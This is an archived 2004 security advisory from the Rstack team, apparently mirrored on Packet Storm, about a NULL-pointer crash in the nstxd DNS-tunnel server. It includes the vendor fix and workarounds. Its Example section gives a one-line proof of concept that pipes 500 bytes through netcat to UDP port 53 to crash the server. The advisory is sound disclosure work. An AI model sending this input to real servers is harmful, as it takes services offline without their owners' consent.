exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

RSTACK-20040325.txt

RSTACK-20040325.txt
Posted Mar 27, 2004
Authored by Rstack Team | Site rstack.org

Rstack Team Security Advisory RSTACK-20040325 - Nstxd has been found vulnerable to a denial of service attack due to a null-pointer-dereference.

tags | advisory, denial of service
SHA-256 | d4de4aa22804d1da1775735c057713af54e0dd21b46baab500dfe906cb86973f

RSTACK-20040325.txt

Change Mirror Download



----------------------------------------------------------------------
Rstack Team (Rstack.org) --- Security Advisory


Advisory Number: RSTACK-20040325
Subject: Nstxd remote DoS-Bug (NULL-pointer-dereference)
Author: Laurent Oudot <oudot@rstack.org>
Discovered: ...
Published: March 25, 2004
----------------------------------------------------------------------


Problem description
===================


Nstxd is the server from the Nstx project. Nstx can be used to create
IP trafic over DNS (can be used by blackhats for special Wifi networks
with DNS open for everybody).

Unexpected input may crash the server called nstxd which will at least
result in a DOS due to a NULL-pointer-dereference.
The service nstxd runs as root to bind the UDP port 53.



Vulnerable versions
===================


Tests were done with the latest version : nstx-1.1-beta3
http://debmail.dereference.de/nstx/nstx-1.1-beta3.tgz


Vendor status
=============


The Nstx team quickly solved this bug.
A new release is available : nstx-1.1-beta4.

>From the ChangeLog :
1.1-beta4: sky
2004/03/26
* Fixed a remote DoS-Bug (NULL-pointer-dereference)



Solutions
=========


* Upgrade your Nstx version at :
http://debmail.dereference.de/nstx/nstx-1.1-beta4.tgz

* Workaround: Containment (chroot, jail...) and low level security
solutions (grsecurity, systrace...) should be use to improve
the security of such a server.



Example
=======

** On the server (assume the IP is 192.168.1.34 for this example):
nstx-1.1-beta3# ./nstxd tun.mydomain.com

** On a remote "evil" client:
remote-hacker$ perl -e '{ print "A" x 500 }' | nc -u 192.168.1.34 53

This will segfault the server.
It might be dangerous as nstxd needs root priviledges (bind port 53).
No exploit to get a remote shell has been reported (just a DOS).


----------------------------------------------------------------------
Copyright (c) Rstack Team
This document is copyrighted. It can't be edited nor republished
without explicit consent of Rstack Team.
For more informations, feel free to contact us.
http://www.rstack.org/
----------------------------------------------------------------------
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close